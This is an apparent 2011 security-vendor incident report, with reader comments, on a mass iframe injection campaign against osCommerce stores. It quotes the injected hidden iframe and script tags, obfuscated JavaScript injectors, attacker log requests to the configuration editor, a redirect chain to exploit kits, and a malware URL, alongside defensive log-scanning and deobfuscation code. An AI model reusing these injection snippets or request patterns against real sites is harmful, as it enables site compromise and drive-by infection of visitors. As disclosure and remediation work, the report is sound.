willysy.com Mass Injection ongoing, over 8 million infected pages, targets osCommerce sites

(Credits: Wayne Huang, Chris Hsiao, NightCola Lin, Sun Huang, Crane Ku)
(Initial post: July 24th)
(Updated: July 30th with new infection number, source IP of attack, log entries, osCommerce vulnerabilities used, and more)
(Updated: Aug 3rd with new video and new infection count: >6 million)
(Updated: Aug 8th with new infection count: >8 million)
[Table of contents]
1. Summary
2. Attack Timeline
3. Source of Attack
4. Vulnerabilities Targeted
5. What Happens to Affected Websites
6. Remediation
7. Infection Details
8. Screenshots

[1. Summary]
1. Number of infections:
As of Aug 3rd, Google shows more than 7,690,000 (willysy) + 629,000 (exero) = 8.3 million infected pages. Note this number is for individual infected pages, not sites or domains.

2. Injected iframe:
Initially it was:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
Later it became:
<script src=http://exero.eu/catalog/jquery.js></script>

3. Attacker:
Ukraine IPs: 178.217.163.33, 178.217.165.111, 178.217.165.71, 178.217.163.214 (all AS47694). Agent string: "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

4. Target and website vulnerability:
osCommerce sites, using at least the following vulnerabilities: osCommerce Remote Edit Site Info Vulnerability, osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability, and Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass.

5. Browser exploits used:
CVE-2010-0840 -- Java Trust
CVE-2010-0188 -- PDF LibTiff
CVE-2010-0886 -- Java SMB
CVE-2006-0003 -- IE MDAC
CVE-2010-1885 -- HCP

6. Exploit domain:
arhyv.ru, counv.ru
Date of registration: July 20th
Registered by: leshkinaira@yahoo.com
IP: 46.16.240.18 (AS51632 Ukrain - Inet Ltd)
Related domains: xlamv.ru, vntum.ru

7. Malware URL:
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot

[2. Attack Timeline]

July 10th -- "Angel Injection" writes about the "osCommerce Remote Edit Site Info Vulnerability" (here, here).

July 11th -- Attacker group starts to test exploitation.
178.217.163.33 - - [11/Jul/2011:12:15:04 -0500] "GET /admin/configuration.php/login.php HTTP/1.1" 200 24492 "http://__Masked__by_armorize.com/admin/configuration.php/login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

July 20th -- Attacker registers the exploit domains arhyv.ru and counv.ru, using email: leshkinaira@yahoo.com

July 23rd -- Attack launched; it injects the "Store Name" variable:
178.217.165.111 - - [23/Jul/2011:13:50:05 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 24835 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

Injected iframes pointed to two domains,
initially:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
and later:
<script src=http://exero.eu/catalog/jquery.js></script>

July 24th -- Initial writeup of this report; at the time there were only 90,000 infected pages:

July 31st -- Google shows more than 3,410,000 (willysy) + 386,000 (exero) = 3.8 million infected pages.
Bing, on the other hand, shows 1.8 million infected pages for willysy:

Aug 3rd -- Google shows more than 5,820,000 (willysy) + 497,000 (exero) = 6.3 million infected pages.

Aug 7th -- Google shows more than 7,690,000 (willysy) + 629,000 (exero) = 8.3 million infected pages.

[3. Source of Attack]

Several IPs have been identified: 178.217.163.33, 178.217.165.111, 178.217.165.71, 178.217.163.214, all of which belong to AS47694. These IPs appear to be located in Ukraine and belong to the ISP www.didan.com.ua.

The attackers used the following agent string:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)

If you have logs or know other IPs that you can share, please send them to Wayne at email: wayne@armorize.com.

[4. Vulnerabilities Targeted]

This attack targets osCommerce websites and leverages several osCommerce vulnerabilities, including:
1. osCommerce Remote Edit Site Info Vulnerability, disclosed July 10th, 2011
2. osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability, disclosed May 14, 2011
3. Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass, disclosed May 30, 2010

Below are some sample log entries:
178.217.163.33 - - [11/Jul/2011:12:15:04 -0500] "GET /admin/configuration.php/login.php HTTP/1.1" 200 24492 "http://__Masked__by_armorize.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

178.217.165.111 - - [23/Jul/2011:13:50:05 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 24835 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:07 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 21883 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

178.217.165.71 - - [23/Jul/2011:19:55:37 -0500] "GET /admin/configuration.php/login.php?cID=1&action=edit HTTP/1.1" 200 25014 "http://__Masked__by_armorize.com/admin/configuration.php?cID=1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

[5. What Happens to Affected Websites]

1. The "Store Name" variable of osCommerce sites is modified to inject one of the tags below:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>
2. On certain websites the attacker also leaves at least one (sometimes more) backdoor, or "webshell". This is especially common on shared hosting accounts, where the backdoor allows access to multiple accounts on the same server:

[6. Remediation]

Below is our best attempt to describe the remediation procedures. If you have questions or would like us to do it for you please contact wayne@armorize.com.

1. Know if you've been infected.

1.1 Search your logs for:
1.1.1 Access from IPs: 178.217.163.33, 178.217.165.111, 178.217.165.71, 178.217.163.214.
1.1.2 Access with agent string: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)

1.2 Search your site for the existence of two iframes:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>

1.3 Or just have HackAlert find everything for you. We know it's good because we built it ;) (greetings Dave, borrowed your quote)

2. Install an anti-virus program on the computer you use to manage your website.

3. Find and remove the injected backdoors.

4. Find and remove the injected iframes / javascripts.

5. Secure your osCommerce installation. Upgrade to the latest version and use .htaccess to protect admin directories.

6. Change your website hosting and your osCommerce admin passwords.
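As an added example (not part of the original post), the checks in steps 1.1 and 1.2 above as a Python script: it matches Apache combined-format log lines against the published source IPs, User-Agent string and the configuration.php/login.php request shape, and looks for the injected markup in page content or in the STORE_NAME configuration value. The sample log lines and STORE_NAME value are constructed here; the first log line is the POST from the timeline above.

```python
import re

# Indicators published in the post: source IPs, User-Agent string and injected markup.
ATTACKER_IPS = {"178.217.163.33", "178.217.165.111",
                "178.217.165.71", "178.217.163.214"}
ATTACKER_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; "
               ".NET CLR 1.1.4322; Media Center PC 4.0)")
INJECTED_MARKUP = ("<iframe src='http://willysy.com/images/banners/'",
                   "<script src=http://exero.eu/catalog/jquery.js>")

# NCSA combined format, as in the post's samples: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
                    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')

def scan_log_line(line):
    """Return the indicator names a log line matches (empty list = no match or unparsable)."""
    m = LOG_RE.match(line.strip())
    if not m:
        return []
    hits = []
    if m.group("ip") in ATTACKER_IPS:
        hits.append("attacker-ip")
    if m.group("agent") == ATTACKER_UA:
        hits.append("attacker-ua")
    # The request shape the post's logs show for reaching the configuration editor:
    # configuration.php with /login.php appended (matched loosely, so a renamed admin dir still hits).
    if "configuration.php/login.php" in m.group("request"):
        hits.append("config-editor-via-login")
    return hits

def scan_log(lines):
    """Map the index of every matching line to its hits; clean lines are omitted."""
    result = {}
    for i, line in enumerate(lines):
        hits = scan_log_line(line)
        if hits:
            result[i] = hits
    return result

def find_injected_markup(text):
    """Return the injected tags present in a rendered page or in the STORE_NAME value."""
    return [tag for tag in INJECTED_MARKUP if tag in text]

# Constructed sample: line 0 is the POST from the timeline above, line 1 is a benign visit.
SAMPLE_LOG = [
    '178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php'
    '?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; '
    'Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"',
    '203.0.113.5 - - [23/Jul/2011:14:02:11 -0500] "GET /index.php HTTP/1.1" 200 5120 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/5.0"',
]
# Constructed STORE_NAME value as the injection leaves it (from the configuration table).
SAMPLE_STORE_NAME = ("My Shop<iframe src='http://willysy.com/images/banners/' "
                     "style='position:absolute;visibility:hidden'></iframe>")
```

Run it over your real access log with `scan_log(open(path).readlines())` and over the STORE_NAME value pulled from the configuration table; a hit on the request shape alone is worth reviewing even from an IP not in the list.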

A very good article on how to secure osCommerce can be found here (thanks Markus):

http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/

And the latest version of osCommerce can be downloaded here:

http://www.oscommerce.com/solutions/downloads

[7. Infection Details]

Here's the original YouTube video we made of the entire infection process; at the time there were only 90,000 infected pages.

And here's the new one we made when there were over 6 million infected pages:

1. Infected website is injected with one of the following scripts:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>

2. The browser loads http://willysy.com/images/banners/ and is redirected (302) to http://papucky.eu/ext/

3. The contents of papucky.eu/ext/ (here on pastebin) load JavaScript from http://gooqlepics.com/include.js?in=864

4. That JavaScript (here on pastebin) decodes to this and generates an iframe pointing to:

http://yandekapi.com/api?in=864

5. The contents of http://yandekapi.com/api?in=864 (here) redirect to: http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV

6. The contents of http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV (here) decode to this, which includes multiple browser exploits.

7. After successful exploitation, the browser downloads and executes malware from here:
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot

[8. Screenshots]

Vulnerable osCommerce installations allow modification of the site's variables without admin access:

When the infection attempt is not successful, the injected iframe is rendered as content (rather than executed) in the title part of the website. Below are some examples:


49 comments:

Anonymous said...

Thank you very much for your information.
How do I fix this malware?

I have found some unusual *.php file in catalog/image and delete them all.

But it still keep changing my store name

Kafeine said...

Sorry for the trivial question.
What is the process monitor used in the screencast ?

With the Sysinternals one or with Yet Another (remote) I was not able to get this interesting window.

Anonymous said...

When I click this pastebin : http://pastebin.com/jAPCwSz8 ESET moans at me. Will the code contained in this pastebin execute just by clicking on the link? I wanted to see exactly what it does but I don't wanna get infected.

Anonymous said...

@Kafeine the process monitor is called process monitor. The title bar of the application gives it away.

Usually the titlebar of an application will tell you exactly what the app is.

Anonymous said...

@Kafeine The shortcut on the desktop is also an indication of what the program is called. It's literally called "process monitor."

Anonymous said...

Where do you find this Process Monitor?

If you look for it you only find the Sysinternals one and Yet Another Remote Process Monitor (whose icon is not far from this one)

starbuck3000 said...

Thank you for sharing your observations!

I am sorry for the potentially dumb question but... do you have details on the infection process on the server-side? How was the iframe injected on the website?

Anonymous said...

My website is affected too. How to resolve this problem?

Henry said...

It looks like they somehow get access to database (most probably through the admin page) and modify the STORE_NAME key in configuration table. Remove the iframe code from the value and it's fixed.

Anonymous said...

Hi Henry, I kept removing that but the store name keep changing. No matter how many times I change my password....:-(

Anonymous said...

@Kafeine about the Process Monitor, look here:

http://www.brothersoft.com/process-monitor-163749.html

Kafeine said...

Many Thanks ! :)

Kafeine said...

Cleaner Link.
It's from BlueOrb
http://www.blueorbsoft.com/ProcessMonitor/index.html

Henry said...

In reference to removing iframe code from STORE_NAME configuration value. If you remove the code and it's coming back this could mean you're under active attack. I also noticed I had a few strange administrator accounts that I know I didn't set up. Naturally removed them.

I suspect the attack somehow happens through the admin page so I blocked the access to the admin page entirely, with exception of specific IP addresses. This can be done with htaccess file inside the admin directory. For example adding below to htaccess file will block all access except from a specific IP address (this would be your IP, also this supports multiple “Allow from” definitions if you access admin page from more than one location like home and office).

Order deny,allow
Deny from all
Allow from YOUR_IP

This however will not work well when your IP address changes often but it's better than getting hacked. The best fix is probably to upgrade to the latest osCommerce release but it's not so easy in my case as I made tons of changes to original code to support what I needed. Take a look if interested
(podatekdochodowy.com or amigolife.com)

mjg said...

Cool sites. Looks like you have put a lot of effort into it

Anonymous said...

A simple question, how are these websites injected with this malicious code?

Anonymous said...

what does the update.exe do?

Anonymous said...

Hi henry, thanks for your suggestion. Have put in place a security check, hopefully it works...

Anonymous said...

And for those who use GNU / Linux is secure? or only affects the Windows platform?

greetings to all.

Alessandro simon.

Wayne Huang said...

Hi guys, there's been more than 1 million infected pages by now, and so we've updated the original post, adding to it the infection number (1,273,000), source IP of attack, log entries, osCommerce vulnerabilities used, and more. Thanks!

Rick said...

Good write up on this ongoing exploit. One thing though - if you are going to mask a URL in a screenshot - mask it in the browser tab too.

;-)

Anonymous said...

@Chris: it's nice that you grey out the URLs in your browser screenshots, but please grey out the URL in browser tab also ;) (have a look at your Chrome screenshot with file manager)

Anonymous said...

@Chris: also in your screenshot of vintagesleazes.com's admin panel of osCommerce. There is a mail address shown in screenshot. So it's not difficult to guess the shops URL. Please grey it out ;)

Anonymous said...

LOL. You forgot to anon the tab with the sites name in point 5.

Anonymous said...

New suspicious URL
hxxp://tiasissi[.]com[.]br/revendedores/jquery/>

Malcolm said...

Thanks for a great post.

I have a few follow up questions.

How does the virus find the osCommerce sites?

We have a lot of hackers coming back trying the same non-existent file in the admin folder. But it seems to be machines not real hackers. Maybe infected computers or servers. Is this the virus trying to find more osCommerce sites?

Thanks and keep up the good work!

Chameleon said...

The biggest problem we face is that companies want to run e-commerce sites on a shoe string. When we mention backups and updates they do not seem to care.

Slowly the more attacks that get highlighted the more people will listen.

This blog is excellent. Keep up the good work.

Anonymous said...

They're now obfuscating the code. Our website was just hit, and they appended this:

["script" tag here, removed as it was rejected by this comment box]ti='.c';ai='af';qo='p';jn='htm';rf='n';tf='doz';yn='ifr';xm='s';cl='o';jd='k9';nn='tv.';rl='85y';r='umu';eh='m/';ec='htt';sb='rc';f='ame';l='://';b=yn.concat(f);gg=xm.concat(sb);qt=ec.concat(qo,l,rf,r,tf,ai,ti,cl,eh,jd,rl,nn,jn);var xp=document.createElement(b);xp.setAttribute('width','1');xp.setAttribute('height','1');xp.frameBorder=0;xp.setAttribute(gg,qt);document.body.appendChild(xp);[end /script tag]
["script" tag here, removed as it was rejected by this comment box]wa='t';p='ht';f='k98';tb='ame';bg='.';v='sr';g='tp:';vf='/z';bs='t';px='v.h';br='yt';k='c';yr='m';ds='m';ej='/';au='/';t='com';sp='ifr';r='ca';cp='y';wz='ir';wf='u';b='5';se=sp.concat(tb);oz=v.concat(k);db=p.concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);var ip=document.createElement(se);ip.setAttribute('width','1');ip.setAttribute('height','1');ip.frameBorder=0;ip.setAttribute(oz,db);document.body.appendChild(ip);[end /script tag]


Which expands to http://zirycatum.com/k985ytv.htm
( zirycatum.com resolves to 178.17.163.92 )
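As an added example (not the commenter's code), a small Python helper that statically resolves the string literals and .concat() chains in the second snippet above to recover the element, attribute and URL it injects, without executing any of the script. The snippet is copied from the comment as posted; the <script> wrapper the comment box stripped is not needed.

```python
import re

# The second snippet from the comment above, minus the <script> wrapper the comment box stripped.
OBFUSCATED = (
    "wa='t';p='ht';f='k98';tb='ame';bg='.';v='sr';g='tp:';vf='/z';bs='t';px='v.h';br='yt';"
    "k='c';yr='m';ds='m';ej='/';au='/';t='com';sp='ifr';r='ca';cp='y';wz='ir';wf='u';b='5';"
    "se=sp.concat(tb);oz=v.concat(k);"
    "db=p.concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);"
    "var ip=document.createElement(se);ip.setAttribute('width','1');"
    "ip.setAttribute('height','1');ip.frameBorder=0;ip.setAttribute(oz,db);"
    "document.body.appendChild(ip);"
)

LITERAL_RE = re.compile(r"^(?:var )?(\w+)='([^']*)'$")                 # x='abc'
CONCAT_RE = re.compile(r"^(?:var )?(\w+)=(\w+)\.concat\(([\w,]*)\)$")  # y=x.concat(a,b)

def resolve_strings(script):
    """Statically fold string literals and .concat() chains into a name -> value map.
    Nothing is executed: statements that are not one of the two shapes are ignored."""
    env = {}
    for stmt in script.split(";"):
        stmt = stmt.strip()
        m = LITERAL_RE.match(stmt)
        if m:
            env[m.group(1)] = m.group(2)
            continue
        m = CONCAT_RE.match(stmt)
        if m:
            name, base, args = m.groups()
            parts = [base] + [a for a in args.split(",") if a]
            env[name] = "".join(env[p] for p in parts)
    return env

def recover_injection(script):
    """Return (element, attribute, value) for the createElement/setAttribute pair that
    takes variables rather than literals, i.e. the part the obfuscation is hiding."""
    env = resolve_strings(script)
    elem = re.search(r"createElement\((\w+)\)", script).group(1)
    attr, val = re.search(r"setAttribute\((\w+),(\w+)\)", script).groups()
    return env[elem], env[attr], env[val]
```

Because the string pieces are folded rather than run, the same helper can be pointed at a snippet lifted straight out of a page source or a database value.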

Wayne Huang said...

Thanks! The incident involving that k985ytv.htm URL is documented here: http://blog.armorize.com/2011/08/k985ytvhtm-fake-antivirus-mass.html

Guest said...

3 different break-in attempts on my OSCommerce site (unsuccessful however on my site) from other IPs than listed above:
174.143.11.196
31.41.10.135
178.217.160.133

Wayne Huang said...

Thank you Chameleon!

Wayne Huang said...

Yes, there are several crawlers crawling for osCommerce sites on a regular basis. A fat list of known osCommerce sites can be downloaded easily and has been updated regularly. There's also an osCommerce defacer that takes this list as input and starts to deface osCommerce sites.

Wayne Huang said...

Thank you will correct it

Wayne Huang said...

Ha!

Wayne Huang said...

The malware infects only Windows machines. The injection will work on osCommerce installations regardless of the underlying operating system.

Wayne Huang said...

By leveraging osCommerce vulnerabilities mentioned in the post.

Wayne Huang said...

Indeed not easy to upgrade, and thanks for the info!

Wayne Huang said...

Yes this is the one. Simpler than the Process Monitor from SysInternals (MS) and therefore makes a better demo.

Wayne Huang said...

Best is to upgrade your osCommerce to the latest version

Wayne Huang said...

No, you won't get infected by visiting http://pastebin.com/jAPCwSz8
Many antivirus just do simple regex and therefore...

Wayne Huang said...

Best that you upgrade to the latest version of osCommerce.


Environmental Remediation said...

awesome share. thank you very much.

George said...

The best fix I have found so far is with the addon called osC_Sec
http://addons.oscommerce.com/info/7834

Guest said...

http://vintagesleaze.com/admin/configuration.php

is still vulnerable!!!!!!

Rodrigo Valenzuela said...

hi, we're running OsCom 2.2 on Windows IIS server.... and being attacked several times in the last 2 months... Any recommendation?? orientation??

thanks

Rodrigo

glycoflex said...

This is a brilliant post, im really glad I found it thank you very much.

actos lawsuits said...

Very interesting article. I've always been interested in knowing more about this.

Bauchmuskeltraining said...

is still vulnerable!!!!!!
